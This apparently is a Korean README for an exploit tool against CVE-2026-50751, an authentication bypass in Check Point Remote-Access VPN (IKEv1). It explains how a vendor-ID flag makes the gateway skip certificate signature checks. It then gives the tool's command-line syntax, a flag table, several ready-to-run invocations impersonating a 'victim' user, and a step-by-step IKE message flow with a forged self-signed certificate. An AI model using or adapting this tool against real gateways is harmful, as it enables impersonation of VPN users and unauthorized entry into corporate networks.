
Check Point Remote-Access VPN(IKEv1)의 인증서 인증 우회.
Check Point Remote-Access VPN(IKEv1)에서의 인증서 인증 우회.
CVE-2026-50751은 Check Point의 iked 데몬에 존재하는 인증 우회 취약점으로, 핫픽스 sk185033이 적용되지 않은 R81.10, R82, R82.10 버전에 존재합니다. 이 결함을 통해 개인 키, 비밀번호, 유효한 인증서 없이 프로비저닝된 모든 Remote Access 사용자로 인증할 수 있습니다.
취약한 iked는 Vendor ID VPNExtFeatures(비트 0x4)에서 플래그를 읽고, 이것이 활성화되어 있으면 verify_peer_auth / verifyMessagePhase1을 생략합니다. 그 결과:
인증서 서명(소유 증명)이 검증되지 않습니다.
신뢰 체인이 검증되지 않습니다.
subject DN이 프로비저닝된 사용자로 확인되는지만 검사됩니다.
CN=이 대상 사용자와 일치하는 자체 서명 인증서를 위조하여 유효하지 않은 서명과 함께 전송하면 됩니다. 게이트웨이가 1단계를 수락하면 해당 사용자로 인증된 것입니다(ISAKMP SA가 해당 DN 아래에 저장됨).
IKE(UDP 500/4500) 및 Visitor Mode(TCPT, TCP 443)에서 작동합니다.
구문
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]
| Flag | 설명 | 기본값 |
|---|
-host | 게이트웨이의 IP 또는 호스트 이름 (필수) | — |
-user | 사칭할 RA 사용자 이름 (필수) | — |
-port | 포트: 500, 4500 (UDP) 또는 443 (TCPT) | 500 |
-org | ICA의 조직(O=). 생략하면 TLS 인증서에서 파생됨 | — |
-ou | 사용자의 조직 단위(OU=) | users |
-timeout | 작업당 타임아웃 | 6s |
-retries | msg1 재시도 횟수 | 1 |
-v | 상세 출력 | false |
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v
공격자 게이트웨이 (취약한 iked)
│ │
│─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (비트 0x4) ──▶│
│ │ 플래그 0x4 읽기
│ │ verify_peer_auth = skip 설정
│◀── msg2: SA 수락됨 ──────────────────────────────────────│
│ │
│─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
│◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
│ │
│ SKEYID, SKEYID_e, IV 파생 │
│ │
│─── msg5 (암호화): 위조된 ID=DN + 자체 서명 CERT │
│ + 임의 서명 ─────────────────────────▶│
│ │ 서명 검증 생략
│ │ DN → 사용자 확인
│◀── msg6 (암호화): SA 설정됨 ─────────────────────────────│
│ │
│ SKEYID_e로 msg6 복호화 → 인증 증명 │